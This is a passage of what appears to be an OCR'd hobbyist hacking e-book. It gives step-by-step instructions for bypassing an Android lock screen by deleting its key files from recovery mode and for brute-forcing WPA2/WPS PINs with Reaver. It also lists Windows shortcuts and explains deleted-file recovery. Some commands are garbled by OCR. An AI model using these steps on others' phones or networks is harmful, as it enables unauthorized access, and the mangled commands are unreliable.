method. Let’s start the 
cracking android lock screen. 


First of all download Aroma 
File manager zip file. Google 
it and you will find it easily. 


Now copy this Aroma file 


manager zip to root of your 
SD card. After copying zip 
file to SD, boot your phone 
into Recovery mode (Each 
phone has different key 
combination to boot up in 
recovery mode, you can 
search it on Google). 


In recovery choose “install 
zip from SD card or apply 
update from SD card", now 
select Aroma.zip which you 
have downloaded earlier. 


After installing or updating 
Aroma file manager will 
open, use volume up and 
down keys for Scrolling as 
you do in recovery. 

In Aroma file manager go to 
menu which is located at 
bottom strip after clicking 
menu select settings. Go to 
bottom in settings and then 
select “mount all partitions in 
startup" after mounting exit 
Aroma file manager. 

Now launch Aroma file 


manager again. 

In aroma Go to 
Data>>System. 

You will find “Gesture.key” 
if you have applied gesture 
lock or “Password.key” if you 
have applied password. 


Long press “Gesture.key” or 
"Password.key" which one is 
available, after long pressing 
it will prompt some option, 
choose delete and delete that 
file and restart your 


device(first exit from aroma 
file manager then restart your 
phone). 


Yuppie! Your phone is 
unlocked now. After 
rebooting it will ask you for 
lock pattern don’t worry now 
you can use any pattern, your 
old pattern has gone away. 


REAVER 
BACKTRACK 


WI-FI CRACKING 
USING REAVER IN 
BACKTRACK 


Well, in this article I will 
show you that how to crack 
WPA2-PSK key using a tool 
names as REAVER. Reaver 


use to crack the key by brute 
force method. 


Let’s see how to crack the 
key using Backtrack. 
Now I am using Backtrack 
Sr3. 

So open the console and 
follow the given steps: 

First thing is to do is run the 
command : 
Airmon-ng start wlanO 


Now the next command to 
write 15: 


Airodump-ng wlanO 

With this command we look 
for available networks and 
information regarding 
BSSID, PWR Beacons, data, 


channel etc... 


Now you need to run the 
following code: 

Reaver -i monO0 -b -c BSSID 
—c channel network name 
Note: - Use the values of 
BSSID channel and network 
name in the above command. 


I have executed the command 
and it starts to work as shown 
in the picture below: 


Now you have to wait, time 
taken is dependent on the 


strength of password and the 
speed of your internet 
connection, 


And finally after brute 
forcing it will give you the 
WPA2 pin. 


WINDOWS 
SHORTCUTS 


SOME USEFUL 
WINDOWS 
SHORTCUTS 


1. Windows Key + Tab: Aero 
2. Windows Key + E: 
Launches Windows Explorer 
3. Windows Key + R: Run 


Command box 

4. Windows Key + F: Search 
5. Windows Key + X: 
Mobility Center 

6. Windows Key + L: Lock 
Computer 

7. Windows Key + U: Ease of 
Access box 

8. Windows Key + P: 
Projector 

9. Windows Key + T: Cycle 
Super Taskbar Items 

10. Windows Key + S: 
OneNote Screen Clipping 


Tool 

11. Windows Key + M: 
Minimize All Windows 

12. Windows Key + D: 
Show/Hide Desktop 

13. Windows Key + Up: 
Maximize Current Window 
14. Windows Key + Down: 
Restore Down / Minimize 
15. Windows Key + Left: 
Tile Current Window to the 
Left 

16. Windows Key + Right: 
Tile Current Windows Right 


17. Windows Key + # (any 
number) 

18. Windows Key + =: 
Magnifier 

19. Windows Key + plus: 
Zoom in 

20. Windows Key + Minus: 
Zooms out 

21. Windows Key + Space: 
Peek at the desktop 


DATA 
FORENSICS 


HOW TO 
RECOVER 
PERMANENTLY 
DELETED FILES 


In this article we will learn 
that how to recover our 


permanently deleted files 
from our computer. 
Sometimes your important 
data is accidently deleted 
from your computer as well 
as from recycle bin also, and 
it’s very important to recover 
that file or data. 


So here I am using a tool 
name as “stellar phonix 
windows data recovery" to 
recover the permanently 
deleted files. 


By using this tool you can 
recover your accidently 
deleted data from your 
computer. 


For it you have to follow 
simple steps as mentioned 
below: 


Click on the option “deleted 
file recovery” or “folder 
recovery” according to your 
choice. 

Then choose the local drive 
from where you want to scan 
for the deleted files/folder. 

Then it asks you for a quick 
scan or deep scan, you can 
choose as according to your 


need. 


Select Volume 


Retresh Drive Liat 
Logical Volume Type File System Size 
ca FIXED urs 100.00 GB 
ол FIXED NTFS 100.00 GB 
Ea FIXED NTFS 97.2168 

Scan Mode 
"Quick Scan’ uses standard scan method to search deleted files. ‘Deep Scan’ 
uses advanced scanning techniques and hence takes more time to search 
© Select Scan Mode 
© Quick Scan Deep Scan 
Continue 


Load Image 
Select Volume 


v n for data Ө 
М} © »d image file, click Load Image’ button. 


3. Click ‘Start Scan’ button to start scanning 


Help Home Back Start Scan 


After that it scans for all the 
deleted files/folder from your 
particular selected local drive. 


And show you the list of the 
entire folder from which files 
are deleted. 


Just click the 
file to preview 


Then you have to select your 
deleted file/folder which you 
want to recover, as I have 
selected here “hacking tools" 
from the folder *vi". 

And then click on the 


recover option to recover 
your data successfully. 
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Just click the 
file to preview 
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Total 8.62 GB in 13813 file(s) in 3353 folder(s) 


Note: - The recovered data 
will work only when the 
address of that location is 
empty/not overwritten from 
where that file/folder is 


CONCLUSION: 


Thanks For reading this book 
and I hope the contents 
described in this book will 
help you to know the intents 
of hackers. Now you are 
capable of securing your own 
and your surrounding 
computers, mobile phones 
and other networks from the 


Threat we called 
“HACKINGAn art of 
exploitation ". 
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